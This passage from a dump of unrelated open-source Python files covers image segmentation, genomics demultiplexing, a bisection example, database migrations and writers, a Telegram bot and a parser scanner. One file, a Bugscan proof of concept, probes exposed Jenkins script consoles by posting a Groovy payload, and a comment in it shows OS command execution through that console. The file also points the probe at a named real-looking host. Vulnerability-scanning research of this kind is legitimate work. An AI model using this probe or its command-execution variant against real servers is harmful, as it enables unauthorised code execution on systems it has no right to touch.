            image,
            32,
            (32 - rows % 32),
            32,
            (32 - cols % 32),
            cv2.BORDER_REFLECT,
        )
        return img_pad
    def pred_nuclei(self, images):
        """Run the nuclei model on a list of images (numpy arrays).

        Each image is rescaled (or resized/padded), its nuclei channel is
        replicated to 3 channels, normalized and passed through the model;
        per-class softmax maps are returned as uint8 arrays restored to the
        original input size (unless ``return_without_scale_restore``).
        """
        def _preprocess(images):
            if isinstance(images[0], str):
                raise NotImplementedError('Currently the model requires images as numpy arrays, not paths.')
                # images = [imageio.imread(image_path) for image_path in images]
            self.target_shapes = [image.shape for image in images]
            #print(images.shape)
            #resize like in original implementation with https://scikit-image.org/docs/dev/api/skimage.transform.html#skimage.transform.resize
            if self.model_width_height:
                images = np.array([transform.resize(image, (self.model_width_height,self.model_width_height))
                                   for image in images])
            else:
                images = [transform.rescale(image, self.scale_factor) for image in images]
            if self.padding:
                images = [self._pad(image) for image in images]
            # Replicate the nuclei channel (channel 2 of RGB, or the whole
            # image when grayscale) across all three model input channels.
            nuc_images = np.array([np.dstack((image[..., 2], image[..., 2], image[..., 2])) if len(image.shape) >= 3
                                   else np.dstack((image, image, image)) for image in images])
            nuc_images = nuc_images.transpose([0, 3, 1, 2])
            #print("nuc", nuc_images.shape)
            return nuc_images
        def _segment_helper(imgs):
            # Normalize with the module-level NORMALIZE constants and run
            # the model without gradients; output is a per-class softmax.
            with torch.no_grad():
                mean = torch.as_tensor(NORMALIZE["mean"], device=self.device)
                std = torch.as_tensor(NORMALIZE["std"], device=self.device)
                imgs = torch.tensor(imgs).float()
                imgs = imgs.to(self.device)
                imgs = imgs.sub_(mean[:, None, None]).div_(std[:, None, None])
                imgs = self.nuclei_model(imgs)
                imgs = F.softmax(imgs, dim=1)
                return imgs
        preprocessed_imgs = _preprocess(images)
        predictions = _segment_helper(preprocessed_imgs)
        predictions = predictions.to("cpu").numpy()
        #dont restore scaling, just save and scale later ...
        predictions = [self._restore_scaling(util.img_as_ubyte(pred), target_shape)
                       for pred, target_shape in zip(predictions, self.target_shapes)]
        return predictions
    def _restore_scaling(self, n_prediction, target_shape):
        """Restore an image from scaling and padding.

        This method is intended for internal use.
        It takes the output from the nuclei model as input.
        """
        n_prediction = n_prediction.transpose([1, 2, 0])
        if self.padding:
            # Crop off the reflect padding added by _pad.
            n_prediction = n_prediction[
                32 : 32 + self.scaled_shape[0], 32 : 32 + self.scaled_shape[1], ...
            ]
        # Zero out the first class channel -- presumably background; TODO confirm.
        n_prediction[..., 0] = 0
        if not self.return_without_scale_restore:
            n_prediction = cv2.resize(
                n_prediction,
                (target_shape[0], target_shape[1]),
                #try INTER_NEAREST_EXACT
                interpolation=cv2.INTER_NEAREST_EXACT,
            )
        return n_prediction
    def pred_cells(self, images, precombined=False):
        """Run the cell model on (microtubule, ER, nuclei) images.

        ``images`` is either the 3-tuple of channel lists accepted by
        ``_image_conversion`` or, when ``precombined`` is True, a list of
        already-stacked H x W x 3 arrays.  Returns uint8 softmax maps,
        restored to the input size unless ``return_without_scale_restore``.
        """
        def _preprocess(images):
            self.target_shapes = [image.shape for image in images]
            for image in images:
                if not len(image.shape) == 3:
                    raise ValueError("image should has 3 channels")
            #resize like in original implementation with https://scikit-image.org/docs/dev/api/skimage.transform.html#skimage.transform.resize
            if self.model_width_height:
                images = np.array([transform.resize(image, (self.model_width_height,self.model_width_height))
                                   for image in images])
            else:
                images = np.array([transform.rescale(image, self.scale_factor, multichannel=True) for image in images])
            if self.padding:
                images = np.array([self._pad(image) for image in images])
            cell_images = images.transpose([0, 3, 1, 2])
            return cell_images
        def _segment_helper(imgs):
            # Same normalization as the nuclei path, but through cell_model.
            with torch.no_grad():
                mean = torch.as_tensor(NORMALIZE["mean"], device=self.device)
                std = torch.as_tensor(NORMALIZE["std"], device=self.device)
                imgs = torch.tensor(imgs).float()
                imgs = imgs.to(self.device)
                imgs = imgs.sub_(mean[:, None, None]).div_(std[:, None, None])
                imgs = self.cell_model(imgs)
                imgs = F.softmax(imgs, dim=1)
                return imgs
        if not precombined:
            images = self._image_conversion(images)
        preprocessed_imgs = _preprocess(images)
        predictions = _segment_helper(preprocessed_imgs)
        predictions = predictions.to("cpu").numpy()
        predictions = [self._restore_scaling(util.img_as_ubyte(pred), target_shape)
                       for pred, target_shape in zip(predictions, self.target_shapes)]
        return predictions
bcbio/illumina/demultiplex.py | matanhofree/bcbio-nextgen | 1 | 12757417 | <filename>bcbio/illumina/demultiplex.py
"""Demultiplex and fastq conversion from Illumina output directories.
Uses Illumina's bcl2fastq: http://support.illumina.com/downloads/bcl2fastq_conversion_software_184.ilmn
"""
import os
import subprocess
import time
from bcbio import utils
def run_bcl2fastq(run_folder, ss_csv, config):
    """Run bcl2fastq for de-multiplexing and fastq generation.

    run_folder -- directory of Illumina outputs
    ss_csv -- Samplesheet CSV file describing samples.
    config -- analysis configuration; provides the core count and optional
        cluster submission settings under config["process"].
    Returns the fastq output directory.  The configure step is skipped when
    the fastq directory already exists (allows resuming a previous run).
    """
    bc_dir = os.path.join(run_folder, "Data", "Intensities", "BaseCalls")
    output_dir = os.path.join(run_folder, "fastq")
    if not os.path.exists(output_dir):
        subprocess.check_call(["configureBclToFastq.pl", "--no-eamss",
                               "--input-dir", bc_dir, "--output-dir", output_dir,
                               "--sample-sheet", ss_csv])
    with utils.chdir(output_dir):
        cores = str(utils.get_in(config, ("algorithm", "num_cores"), 1))
        cmd = ["make", "-j", cores]
        # Either submit the make step to a cluster scheduler and poll for
        # completion, or run it locally in-process.
        if "submit_cmd" in config["process"] and "bcl2fastq_batch" in config["process"]:
            _submit_and_wait(cmd, cores, config, output_dir)
        else:
            subprocess.check_call(cmd)
    return output_dir
def _submit_and_wait(cmd, cores, config, output_dir):
    """Submit command with batch script specified in configuration, wait until finished

    The batch script template (config["process"]["bcl2fastq_batch"]) is
    expected to touch "<batch_script>.finished" on success or
    "<batch_script>.failed" on error; this function polls for those sentinel
    files every 5 seconds and raises ValueError on failure.
    NOTE(review): if neither sentinel ever appears this loop waits forever.
    """
    batch_script = "submit_bcl2fastq.sh"
    if not os.path.exists(batch_script + ".finished"):
        # Fresh attempt: clear any stale failure marker and (re)write the script.
        if os.path.exists(batch_script + ".failed"):
            os.remove(batch_script + ".failed")
        with open(batch_script, "w") as out_handle:
            out_handle.write(config["process"]["bcl2fastq_batch"].format(
                cores=cores, bcl2fastq_cmd=" ".join(cmd), batch_script=batch_script))
        submit_cmd = utils.get_in(config, ("process", "submit_cmd"))
        subprocess.check_call(submit_cmd.format(batch_script=batch_script), shell=True)
    # wait until finished or failure checkpoint file
    while 1:
        if os.path.exists(batch_script + ".finished"):
            break
        if os.path.exists(batch_script + ".failed"):
            raise ValueError("bcl2fastq batch script failed: %s" %
                             os.path.join(output_dir, batch_script))
        time.sleep(5)
| 2.296875 | 2 |
Programas_Capitulo_05/Cap05_pagina_132_bisection_con_for.py | rojassergio/Aprendiendo-a-programar-en-Python-con-mi-computador | 17 | 12757418 | <gh_stars>10-100
'''
@author: <NAME>
@contact: <EMAIL>
--------------------------
Contenido bajo
Atribución-NoComercial-CompartirIgual 3.0 Venezuela (CC BY-NC-SA 3.0 VE)
http://creativecommons.org/licenses/by-nc-sa/3.0/ve/
Creado en abril 21, 2016
'''
def biseccion(f, a, b, tol=1.e-6):
    """Find a real root of ``f`` on ``[a, b]`` by the bisection method.

    f: continuous function whose root is sought
    a: lower end of the bracketing interval
    b: upper end of the bracketing interval
    tol: absolute tolerance on the interval width

    Returns a tuple ``(iterations, root, f(root))``, or
    ``(None, None, None)`` when ``f(a)`` and ``f(b)`` have the same sign
    (no root is bracketed).
    """
    fa = f(a)
    if fa * f(b) > 0:
        # No sign change over [a, b]: bisection cannot bracket a root.
        return None, None, None
    # Plain counter loop replaces the original self-appending-list trick,
    # which abused ``for i in itera`` plus itera.append() as a while loop.
    i = 0
    while True:
        c = (a + b) * 0.5          # interval midpoint
        fmed = f(c)
        if abs(b - a) < tol:
            return i, c, fmed
        if fa * fmed <= 0:
            b = c                  # root lies in [a, c]
        else:
            a = c                  # root lies in [c, b]
            fa = fmed
        i += 1
def f(x):
    """Quadratic test function whose real roots we seek; one root is
    bracketed by the interval (-6, -4)."""
    value = x**2 + 4.0*x - 4.0
    return value
tol = 1e-10
a, b = 0, 2 # root to search for
a, b = -6, -4 # root visible in the graph (overrides the interval above)
# NOTE(review): ``iter`` shadows the builtin of the same name.
iter, x, fx = biseccion(f, a, b, tol)
if x is None:
    # Spanish: "f(x) does NOT change sign in the interval"
    print('\t f(x) NO cambia signo en el intervalo [{0:g},{1:g}]'.format(a, b))
else:
    # Spanish: "In N iterations and with tolerance t the root is:"
    print('\t En {0:d} iteraciones y con tolerancia de {1:g} la raiz es:'
          .format(iter,tol))
    print('\t x = {0:g}, generando f({0:g}) = {1:g}'.format(x,fx))
| 3.15625 | 3 |
Bugscan_exploits-master/exp_list/exp-1667.py | csadsl/poc_exp | 11 | 12757419 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
POC Name : jenkins_script_console_java_execution
Author : fenyouxiangyu
mail : <EMAIL>
Referer : http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
"""
# Description : This module uses the Jenkins Groovy script console to execute OS commands using Java.
# Command : println "netstat -aon".execute().text
import urlparse
def assign(service, arg):
    """Accept only 'jenkins' targets: return (True, arg), or None otherwise."""
    if service != 'jenkins':
        return None
    return True, arg
def audit(arg):
    """Probe the Jenkins script console at ``<arg>script/`` for
    unauthenticated Groovy execution and report a hole when found."""
    target = arg + 'script/'
    payload = 'script=println%28Jenkins%29&json=%7B%22script%22%3A+%22println%28Jenkins%29%22%2C+%22%22%3A+%22%22%7D'
    code, head, res, errcode, _ = curl.curl2(target, payload)
    # Groovy ran server-side iff the class name echoes back in the response.
    if code == 200 and 'class jenkins.model.Jenkins' in res:
        security_hole(target)
# Manual smoke test against a known host (dummy supplies curl/security_hole).
if __name__ == '__main__':
    from dummy import *
    audit(assign('jenkins', 'http://sinv-56038.edu.hsr.ch/jenkins/')[1])
im/ib/ib_sql_writer_backend.py | ajmal017/amp | 0 | 12757420 | import pandas as pd
import psycopg2.extras as pextra
import im.common.data.types as icdtyp
import im.common.sql_writer_backend as icsqlw
class IbSqlWriterBackend(icsqlw.AbstractSqlWriterBackend):
    """
    Manager of CRUD operations on a database defined in db.sql.

    All insert methods silently skip duplicate rows via
    ``ON CONFLICT DO NOTHING``.
    """
    # Maps a data frequency to the table it is stored in and the name of
    # its timestamp column.
    FREQ_ATTR_MAPPING = {
        icdtyp.Frequency.Daily: {
            "table_name": "IbDailyData",
            "datetime_field_name": "date",
        },
        icdtyp.Frequency.Minutely: {
            "table_name": "IbMinuteData",
            "datetime_field_name": "datetime",
        },
        icdtyp.Frequency.Tick: {
            "table_name": "IbTickData",
            "datetime_field_name": "datetime",
        },
    }
    def insert_bulk_daily_data(
        self,
        df: pd.DataFrame,
    ) -> None:
        """
        Insert daily data for a particular TradeSymbol entry in bulk.

        Duplicate rows are skipped (ON CONFLICT DO NOTHING).

        :param df: a dataframe from s3; must contain the columns named in
            the INSERT template below (trade_symbol_id, date, open, ...)
        """
        with self.conn:
            with self.conn.cursor() as curs:
                pextra.execute_values(
                    curs,
                    "INSERT INTO IbDailyData "
                    "(trade_symbol_id, date, open, high, low, close, volume, average, barCount) "
                    "VALUES %s ON CONFLICT DO NOTHING",
                    df.to_dict("records"),
                    template="(%(trade_symbol_id)s, %(date)s, %(open)s,"
                    " %(high)s, %(low)s, %(close)s, %(volume)s, %(average)s, %(barCount)s)",
                )
    def insert_daily_data(
        self,
        trade_symbol_id: int,
        date: str,
        open_val: float,
        high_val: float,
        low_val: float,
        close_val: float,
        volume_val: int,
        average_val: float,
        bar_count_val: int,
    ) -> None:
        """
        Insert daily data for a particular TradeSymbol entry.

        Duplicate rows are skipped (ON CONFLICT DO NOTHING).

        :param trade_symbol_id: id of TradeSymbol
        :param date: date string
        :param open_val: open price
        :param high_val: high price
        :param low_val: low price
        :param close_val: close price
        :param volume_val: volume
        :param average_val: average
        :param bar_count_val: bar count
        """
        with self.conn:
            with self.conn.cursor() as curs:
                curs.execute(
                    "INSERT INTO IbDailyData "
                    "(trade_symbol_id, date, open, high, low, close, volume, average, barCount) "
                    "VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s) ON CONFLICT DO NOTHING",
                    [
                        trade_symbol_id,
                        date,
                        open_val,
                        high_val,
                        low_val,
                        close_val,
                        volume_val,
                        average_val,
                        bar_count_val,
                    ],
                )
    def insert_bulk_minute_data(
        self,
        df: pd.DataFrame,
    ) -> None:
        """
        Insert minute data for a particular TradeSymbol entry in bulk.

        Duplicate rows are skipped (ON CONFLICT DO NOTHING).

        :param df: a dataframe from s3; must contain the columns named in
            the INSERT template below (trade_symbol_id, datetime, open, ...)
        """
        with self.conn:
            with self.conn.cursor() as curs:
                pextra.execute_values(
                    curs,
                    "INSERT INTO IbMinuteData "
                    "(trade_symbol_id, datetime, open, high, low, close, "
                    "volume, average, barCount) "
                    "VALUES %s ON CONFLICT DO NOTHING",
                    df.to_dict("records"),
                    template="(%(trade_symbol_id)s, %(datetime)s, %(open)s,"
                    " %(high)s, %(low)s, %(close)s, %(volume)s, %(average)s, %(barCount)s)",
                )
    def insert_minute_data(
        self,
        trade_symbol_id: int,
        date_time: str,
        open_val: float,
        high_val: float,
        low_val: float,
        close_val: float,
        volume_val: int,
        average_val: float,
        bar_count_val: int,
    ) -> None:
        """
        Insert minute data for a particular TradeSymbol entry.

        Duplicate rows are skipped (ON CONFLICT DO NOTHING).

        :param trade_symbol_id: id of TradeSymbol
        :param date_time: date and time string
        :param open_val: open price
        :param high_val: high price
        :param low_val: low price
        :param close_val: close price
        :param volume_val: volume
        :param average_val: average
        :param bar_count_val: bar count
        """
        with self.conn:
            with self.conn.cursor() as curs:
                curs.execute(
                    "INSERT INTO IbMinuteData "
                    "(trade_symbol_id, datetime, open, high, low, close, "
                    "volume, average, barCount) "
                    "VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s) ON CONFLICT DO NOTHING",
                    [
                        trade_symbol_id,
                        date_time,
                        open_val,
                        high_val,
                        low_val,
                        close_val,
                        volume_val,
                        average_val,
                        bar_count_val,
                    ],
                )
    def insert_tick_data(
        self,
        trade_symbol_id: int,
        date_time: str,
        price_val: float,
        size_val: int,
    ) -> None:
        """
        Insert tick data for a particular TradeSymbol entry.

        Duplicate rows are skipped (ON CONFLICT DO NOTHING).

        :param trade_symbol_id: id of TradeSymbol
        :param date_time: date and time string
        :param price_val: price of the transaction
        :param size_val: size of the transaction
        """
        with self.conn:
            with self.conn.cursor() as curs:
                curs.execute(
                    "INSERT INTO IbTickData "
                    "(trade_symbol_id, datetime, price, size) "
                    "VALUES (%s, %s, %s, %s) ON CONFLICT DO NOTHING",
                    [
                        trade_symbol_id,
                        date_time,
                        price_val,
                        size_val,
                    ],
                )
| 2.5 | 2 |
tests/test_storm.py | stijnvanhoey/hydropy | 51 | 12757421 | # -*- coding: utf-8 -*-
"""
test_storm.py
"""
from __future__ import absolute_import, print_function
import unittest
from hydropy import storm
class TestStorm(unittest.TestCase):
    """Placeholder test case for the hydropy ``storm`` module."""
    def test_storm_selectstorm(self):
        # TODO: stub -- makes no assertions yet; add coverage for storm
        # selection once the API is exercised here.
        pass
| 1.398438 | 1 |
TgBot-v2/src/commands/inline_commands.py | cppshizoidS/Python | 5 | 12757422 | from telegram import CallbackQuery
from telegram.error import BadRequest
import utils.utils as utl
import commands.keyboards as kb
def foo_command(query: CallbackQuery):
    """Replace the originating message with the *foo* page (MarkdownV2)."""
    try:
        formatted = utl.prep_for_md("This is *foo*", ignore=['*'])
        query.edit_message_text(
            formatted,
            reply_markup=kb.main_menu,
            parse_mode='MarkdownV2')
    except BadRequest as err:
        # Telegram rejects edits that would not change the message.
        print("Bad request")
        print(err)
def bar_command(query: CallbackQuery):
    """Replace the originating message with the plain-text *bar* page."""
    try:
        query.edit_message_text("This is bar", reply_markup=kb.main_menu)
    except BadRequest as err:
        # Telegram rejects edits that would not change the message.
        print("Bad request")
        print(err)
| 2.65625 | 3 |
pyrfr/examples/pyrfr_pickle_example.py | sslavian812/random_forest_run | 0 | 12757423 | import sys
sys.path.append("..")
import os
here = os.path.dirname(os.path.realpath(__file__))
import pickle
import tempfile
import numpy as np
import pyrfr.regression
data_set_prefix = '%(here)s/../test_data_sets/diabetes_' % {"here":here}
features = np.loadtxt(data_set_prefix+'features.csv', delimiter=",")
responses = np.loadtxt(data_set_prefix+'responses.csv', delimiter=",")
data = pyrfr.regression.default_data_container(10)
data.import_csv_files(data_set_prefix+'features.csv', data_set_prefix+'responses.csv')
# create an instance of a regerssion forest using binary splits and the RSS loss
the_forest = pyrfr.regression.binary_rss_forest()
#reset to reseed the rng for the next fit
rng = pyrfr.regression.default_random_engine(42)
# create an instance of a regerssion forest using binary splits and the RSS loss
the_forest = pyrfr.regression.binary_rss_forest()
the_forest.options.num_trees = 16
# the forest's parameters
the_forest.options.compute_oob_error = True
the_forest.options.do_bootstrapping=True # default: false
the_forest.options.num_data_points_per_tree=(data.num_data_points()//4)* 3 # means same number as data points
the_forest.options.tree_opts.max_features = data.num_features()//2 # 0 would mean all the features
the_forest.options.tree_opts.min_samples_to_split = 0 # 0 means split until pure
the_forest.options.tree_opts.min_samples_in_leaf = 0 # 0 means no restriction
the_forest.options.tree_opts.max_depth=1024 # 0 means no restriction
the_forest.options.tree_opts.epsilon_purity = 1e-8 # when checking for purity, the data points can differ by this epsilon
the_forest.fit(data, rng)
predictions_1 = [ the_forest.predict(f.tolist()) for f in features]
with tempfile.NamedTemporaryFile(mode='w+b', delete=False) as f:
fname = f.name
pickle.dump(the_forest, f)
with open(fname, 'r+b') as fh:
a_second_forest = pickle.load(fh)
os.remove(fname)
predictions_2 = [ a_second_forest.predict(f.tolist()) for f in features]
if (np.allclose(predictions_1, predictions_2)):
print("successfully pickled/unpickled the forest")
else:
print("something went wrong")
| 2.609375 | 3 |
spitfire/compiler/scanner.py | StevenLudwig/spitfire | 0 | 12757424 | import yappsrt
import spitfire.compiler.parser
# SpitfireScanner uses the order of the match, not the length of the match to
# determine what token to return. I'm not sure how fragille this is long-term,
# but it seems to have been the right solution for a number of small problems
# allong the way.
_restrict_cache = {}
class SpitfireScanner(spitfire.compiler.parser._SpitfireParserScanner):
    """Scanner that returns the FIRST matching pattern, not the longest
    (see the module comment above for why)."""
    def token(self, i, restrict=0):
        """Get the i'th token, and if i is one past the end, then scan
        for another token; restrict is a list of tokens that
        are allowed, or 0 for any token."""
        if i == len(self.tokens):
            self.scan(restrict)
        if i < len(self.tokens):
            # Make sure the restriction is more restricted
            restriction = self.restrictions[i]
            if restrict and restriction:
                if not restriction.issuperset(restrict):
                    raise NotImplementedError(
                        "Unimplemented: restriction set changed", restrict, self.restrictions[i])
                return self.tokens[i]
            elif not restrict and not restriction:
                return self.tokens[i]
        # Either i is out of range or the restriction sets disagree.
        raise yappsrt.NoMoreTokens(i, len(self.tokens), self.tokens[i], restrict, self.restrictions[i], self.tokens)
    def scan(self, restrict):
        """Should scan another token and add it to the list, self.tokens,
        and add the restriction to self.restrictions"""
        # Cache the list of patterns we check to avoid unnecessary iteration
        restrict = frozenset(restrict)
        try:
            patterns = _restrict_cache[restrict]
        except KeyError:
            patterns = [pair for pair in self.patterns if not restrict or pair[0] in restrict]
            _restrict_cache[restrict] = patterns
        _input, _pos = self.input, self.pos
        for best_pat, regexp in patterns:
            m = regexp.match(_input, _pos)
            if m:
                tname = m.group(0)
                best_match = len(tname)
                # msolo: use the first match, not the 'best'
                break
        else:
            # If we didn't find anything, raise an error
            msg = "Bad Token"
            if restrict:
                msg = "Trying to find one of " + ', '.join(restrict)
            raise yappsrt.SyntaxError(self.pos, msg)
        # Create a token with this data
        end = _pos + best_match
        token = (_pos, end, best_pat, tname)
        self.pos = end
        # Only add this token if it's not in the list
        # (to prevent looping)
        if not self.tokens or token != self.tokens[-1]:
            self.tokens.append(token)
            self.restrictions.append(restrict)
            return
| 2.3125 | 2 |
backend/app/alembic/versions/d11266229bcf_added_role_models_and_organization_model.py | saschajullmann/sedotra | 0 | 12757425 | <filename>backend/app/alembic/versions/d11266229bcf_added_role_models_and_organization_model.py
"""added role models and organization model
Revision ID: <KEY>
Revises: <KEY>
Create Date: 2021-02-16 06:29:37.816314
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
    """Create organization and role tables; re-link dataroom/team to organization."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('organization',
    sa.Column('id', postgresql.UUID(as_uuid=True), server_default=sa.text('uuid_generate_v4()'), nullable=False),
    sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
    sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
    sa.Column('name', sa.String(), nullable=True),
    sa.Column('description', sa.String(), nullable=True),
    sa.Column('is_active', sa.Boolean(), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_organization_created_at'), 'organization', ['created_at'], unique=False)
    op.create_index(op.f('ix_organization_id'), 'organization', ['id'], unique=False)
    op.create_index(op.f('ix_organization_name'), 'organization', ['name'], unique=True)
    op.create_index(op.f('ix_organization_updated_at'), 'organization', ['updated_at'], unique=False)
    op.create_table('organization_roles',
    sa.Column('id', postgresql.UUID(as_uuid=True), server_default=sa.text('uuid_generate_v4()'), nullable=False),
    sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
    sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
    sa.Column('name', sa.String(), nullable=True),
    sa.Column('user_id', postgresql.UUID(as_uuid=True), nullable=True),
    sa.Column('organization_id', postgresql.UUID(as_uuid=True), nullable=True),
    sa.ForeignKeyConstraint(['organization_id'], ['organization.id'], ),
    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('organization_id', 'user_id')
    )
    op.create_index(op.f('ix_organization_roles_created_at'), 'organization_roles', ['created_at'], unique=False)
    op.create_index(op.f('ix_organization_roles_id'), 'organization_roles', ['id'], unique=False)
    op.create_index(op.f('ix_organization_roles_updated_at'), 'organization_roles', ['updated_at'], unique=False)
    op.create_table('dataroom_roles',
    sa.Column('id', postgresql.UUID(as_uuid=True), server_default=sa.text('uuid_generate_v4()'), nullable=False),
    sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
    sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
    sa.Column('name', sa.String(), nullable=True),
    sa.Column('team_id', postgresql.UUID(as_uuid=True), nullable=True),
    sa.Column('user_id', postgresql.UUID(as_uuid=True), nullable=True),
    sa.Column('dataroom_id', postgresql.UUID(as_uuid=True), nullable=True),
    sa.ForeignKeyConstraint(['dataroom_id'], ['dataroom.id'], ),
    sa.ForeignKeyConstraint(['team_id'], ['team.id'], ),
    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('dataroom_id', 'user_id')
    )
    op.create_index(op.f('ix_dataroom_roles_created_at'), 'dataroom_roles', ['created_at'], unique=False)
    op.create_index(op.f('ix_dataroom_roles_id'), 'dataroom_roles', ['id'], unique=False)
    op.create_index(op.f('ix_dataroom_roles_updated_at'), 'dataroom_roles', ['updated_at'], unique=False)
    op.create_table('team_roles',
    sa.Column('id', postgresql.UUID(as_uuid=True), server_default=sa.text('uuid_generate_v4()'), nullable=False),
    sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
    sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
    sa.Column('name', sa.String(), nullable=True),
    sa.Column('user_id', postgresql.UUID(as_uuid=True), nullable=True),
    sa.Column('team_id', postgresql.UUID(as_uuid=True), nullable=True),
    sa.ForeignKeyConstraint(['team_id'], ['team.id'], ),
    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('team_id', 'user_id')
    )
    op.create_index(op.f('ix_team_roles_created_at'), 'team_roles', ['created_at'], unique=False)
    op.create_index(op.f('ix_team_roles_id'), 'team_roles', ['id'], unique=False)
    op.create_index(op.f('ix_team_roles_updated_at'), 'team_roles', ['updated_at'], unique=False)
    # team membership now lives in team_roles instead of the join table.
    op.drop_table('team_user')
    # datarooms now belong to an organization rather than a team.
    op.add_column('dataroom', sa.Column('organization_fk', postgresql.UUID(as_uuid=True), nullable=False))
    op.drop_constraint('dataroom_team_fk_fkey', 'dataroom', type_='foreignkey')
    op.create_foreign_key(None, 'dataroom', 'organization', ['organization_fk'], ['id'])
    op.drop_column('dataroom', 'team_fk')
    op.add_column('team', sa.Column('organization_fk', postgresql.UUID(as_uuid=True), nullable=False))
    op.create_foreign_key(None, 'team', 'organization', ['organization_fk'], ['id'])
    # ### end Alembic commands ###
def downgrade():
    """Revert to the pre-roles schema.

    Drops the ``*_roles`` tables and the ``organization`` table, restores
    the plain ``team_user`` association table, and re-points ``dataroom``
    from ``organization`` back to ``team``.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    # NOTE(review): the constraint names below are None (autogenerate
    # placeholders) — confirm they resolve on the target backend.
    op.drop_constraint(None, 'team', type_='foreignkey')
    op.drop_column('team', 'organization_fk')
    op.add_column('dataroom', sa.Column('team_fk', postgresql.UUID(), autoincrement=False, nullable=False))
    op.drop_constraint(None, 'dataroom', type_='foreignkey')
    op.create_foreign_key('dataroom_team_fk_fkey', 'dataroom', 'team', ['team_fk'], ['id'])
    op.drop_column('dataroom', 'organization_fk')
    # Recreate the old plain many-to-many association table.
    op.create_table('team_user',
    sa.Column('team_fk', postgresql.UUID(), autoincrement=False, nullable=True),
    sa.Column('user_fk', postgresql.UUID(), autoincrement=False, nullable=True),
    sa.ForeignKeyConstraint(['team_fk'], ['team.id'], name='team_user_team_fk_fkey'),
    sa.ForeignKeyConstraint(['user_fk'], ['user.id'], name='team_user_user_fk_fkey')
    )
    # Indexes must be dropped before their tables.
    op.drop_index(op.f('ix_team_roles_updated_at'), table_name='team_roles')
    op.drop_index(op.f('ix_team_roles_id'), table_name='team_roles')
    op.drop_index(op.f('ix_team_roles_created_at'), table_name='team_roles')
    op.drop_table('team_roles')
    op.drop_index(op.f('ix_dataroom_roles_updated_at'), table_name='dataroom_roles')
    op.drop_index(op.f('ix_dataroom_roles_id'), table_name='dataroom_roles')
    op.drop_index(op.f('ix_dataroom_roles_created_at'), table_name='dataroom_roles')
    op.drop_table('dataroom_roles')
    op.drop_index(op.f('ix_organization_roles_updated_at'), table_name='organization_roles')
    op.drop_index(op.f('ix_organization_roles_id'), table_name='organization_roles')
    op.drop_index(op.f('ix_organization_roles_created_at'), table_name='organization_roles')
    op.drop_table('organization_roles')
    op.drop_index(op.f('ix_organization_updated_at'), table_name='organization')
    op.drop_index(op.f('ix_organization_name'), table_name='organization')
    op.drop_index(op.f('ix_organization_id'), table_name='organization')
    op.drop_index(op.f('ix_organization_created_at'), table_name='organization')
    op.drop_table('organization')
    # ### end Alembic commands ###
| 1.75 | 2 |
algosec_resilient/components/algosec_list_associated_applications.py | algosec/algosec-resilient | 1 | 12757426 | <reponame>algosec/algosec-resilient<filename>algosec_resilient/components/algosec_list_associated_applications.py
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
"""Function implementation"""
import logging
from resilient_circuits import function, FunctionResult, StatusMessage
from algosec_resilient.components.algosec_base_component import AlgoSecComponent
logger = logging.getLogger(__name__)
class AlgoSecListAssociatedApplications(AlgoSecComponent):
    """Component that implements the Resilient function
    'algosec_list_associated_applications'."""
    @function("algosec_list_associated_applications")
    def _algosec_list_associated_applications_function(self, event, *args, **kwargs):
        """
        Function: Given an IP/Host list all associated BusinessFlow applications.
        Provides a better assessment of the risk of the incident. The results contain whether or not it's a critical
        application and a url link to the application on the AlgoSec BusinessFlow dashboard.
        """
        # Delegate to the base class, which performs login and then
        # drives the generator implemented in _logic() below.
        return self.run_login(kwargs)
    def _logic(self, algosec_hostname):
        """Generator yielding StatusMessages and, last, a FunctionResult.

        Kept separate from the decorated entry point because the @function
        decorator offered by resilient-circuits is impossible to unit test.
        """
        client = self.algosec.business_flow()
        logger.info("algosec_hostname: %s", algosec_hostname)
        # PUT YOUR FUNCTION IMPLEMENTATION CODE HERE
        yield StatusMessage("starting...")
        # One summary dict per BusinessFlow application associated with the host.
        associated_applications = [
            {
                'artifact_ip': algosec_hostname,
                'application_name': app_json['name'],
                'is_critical': client.is_application_critical(app_json),
                # Render the dashboard link as an HTML anchor for the Resilient UI.
                'businessflow_dashboard': '<a href="{}">{}</a>'.format(
                    client.get_abf_application_dashboard_url(app_json['revisionID']),
                    app_json['name']
                ),
            }
            for app_json in client.get_associated_applications(algosec_hostname)
        ]
        results = {
            'success': True,
            'entries': associated_applications
        }
        yield StatusMessage("done...")
        # Produce a FunctionResult with the results
        yield FunctionResult(results)
| 2.171875 | 2 |
acumoscommon/services/datasource_service.py | acumos/model-builder-h2o-model-builder | 0 | 12757427 | <reponame>acumos/model-builder-h2o-model-builder
#!/usr/bin/env python3
#
# ===============LICENSE_START=======================================================
# Acumos
# ===================================================================================
# Copyright (C) 2018 AT&T Intellectual Property. All rights reserved.
# ===================================================================================
# This Acumos software file is distributed by AT&T
# under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
